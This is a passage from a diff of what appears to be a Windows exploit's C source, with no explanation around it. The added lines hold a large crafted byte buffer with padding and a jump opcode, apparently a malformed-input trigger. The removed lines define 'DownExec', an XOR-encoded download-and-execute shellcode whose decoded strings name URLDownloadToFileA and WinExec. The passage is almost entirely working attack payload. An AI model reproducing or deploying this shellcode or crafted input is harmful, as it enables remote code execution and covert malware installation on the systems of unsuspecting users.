+\"\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\"
+\"\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\xeb\\x10\\x81\\x90\"
+\"\\x8b\\xf8\\x00\\x0d\\xff\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\"
+\"\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\"
+\"\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\"
+\"\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\"
+\"\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\"
+\"\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\"
+\"\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\"
+\"\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\"
+\"\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\"
+\"\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\"
+\"\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\"
+\"\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x00\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x4e\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x22\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\xd5\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x00\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x35\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\xb3\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x3d\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x4a\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x00\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x1f\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\xdd\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x00\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\xf8\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x05\\x05\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x10\\x11\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x0a\\x11\\x11\"
+\"\\x11\\x11\\x19\\x0a\\x01\\x01\\x01\\x01\\x10\\x0e\\x01\\x01\\x01\\x01\\x01\\x05\"
+\"\\x08\\x1f\\x01\\x15\\x11\\x1c\\x1c\\x0a\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x00\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x08\\x11\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x10\\x00\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x19\\x00\\x0c\\x19\\x08\"
+\"\\x11\\x00\\x08\\xfb\\x01\\x01\\x08\\x11\\x01\\x01\\x01\\x01\\x01\\x0a\\x00\\x1f\"
+\"\\x1f\\x11\\x08\\x0a\\x19\\x00\\x05\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\xcd\\x01\\x01\\x01\\x01\"
+\"\\x8b\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x1a\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x00\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\"
+\"\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\";
 
 unsigned char DownExec[] =
-"\xeb\x10\x5a\x4a\x33\xc9\x66\xb9\x3c\x01\x80\x34\x0a\x99\xe2\xfa"
-"\xeb\x05\xe8\xeb\xff\xff\xff\x70\x4c\x99\x99\x99\xc3\xfd\x38\xa9"
-"\x99\x99\x99\x12\xd9\x95\x12\xe9\x85\x34\x12\xd9\x91\x12\x41\x12"
-"\xea\xa5\x12\xed\x87\xe1\x9a\x6a\x12\xe7\xb9\x9a\x62\x12\xd7\x8d"
-"\xaa\x74\xcf\xce\xc8\x12\xa6\x9a\x62\x12\x6b\xf3\x97\xc0\x6a\x3f"
-"\xed\x91\xc0\xc6\x1a\x5e\x9d\xdc\x7b\x70\xc0\xc6\xc7\x12\x54\x12"
-"\xdf\xbd\x9a\x5a\x48\x78\x9a\x58\xaa\x50\xff\x12\x91\x12\xdf\x85"
-"\x9a\x5a\x58\x78\x9b\x9a\x58\x12\x99\x9a\x5a\x12\x63\x12\x6e\x1a"
-"\x5f\x97\x12\x49\xf3\x9d\xc0\x71\xc9\x99\x99\x99\x1a\x5f\x94\xcb"
-"\xcf\x66\xce\x65\xc3\x12\x41\xf3\x98\xc0\x71\xa4\x99\x99\x99\x1a"
-"\x5f\x8a\xcf\xdf\x19\xa7\x19\xec\x63\x19\xaf\x19\xc7\x1a\x75\xb9"
-"\x12\x45\xf3\xb9\xca\x66\xce\x75\x5e\x9d\x9a\xc5\xf8\xb7\xfc\x5e"
-"\xdd\x9a\x9d\xe1\xfc\x99\x99\xaa\x59\xc9\xc9\xca\xcf\xc9\x66\xce"
-"\x65\x12\x45\xc9\xca\x66\xce\x69\xc9\x66\xce\x6d\xaa\x59\x35\x1c"
-"\x59\xec\x60\xc8\xcb\xcf\xca\x66\x4b\xc3\xc0\x32\x7b\x77\xaa\x59"
-"\x5a\x71\xbf\x66\x66\x66\xde\xfc\xed\xc9\xeb\xf6\xfa\xd8\xfd\xfd"
-"\xeb\xfc\xea\xea\x99\xde\xfc\xed\xca\xe0\xea\xed\xfc\xf4\xdd\xf0"
-"\xeb\xfc\xfa\xed\xf6\xeb\xe0\xd8\x99\xce\xf0\xf7\xdc\xe1\xfc\xfa"
-"\x99\xdc\xe1\xf0\xed\xcd\xf1\xeb\xfc\xf8\xfd\x99\xd5\xf6\xf8\xfd"
-"\xd5\xf0\xfb\xeb\xf8\xeb\xe0\xd8\x99\xec\xeb\xf5\xf4\xf6\xf7\x99"
-"\xcc\xcb\xd5\xdd\xf6\xee\xf7\xf5\xf6\xf8\xfd\xcd\xf6\xdf\xf0\xf5"
-"\xfc\xd8\x99";
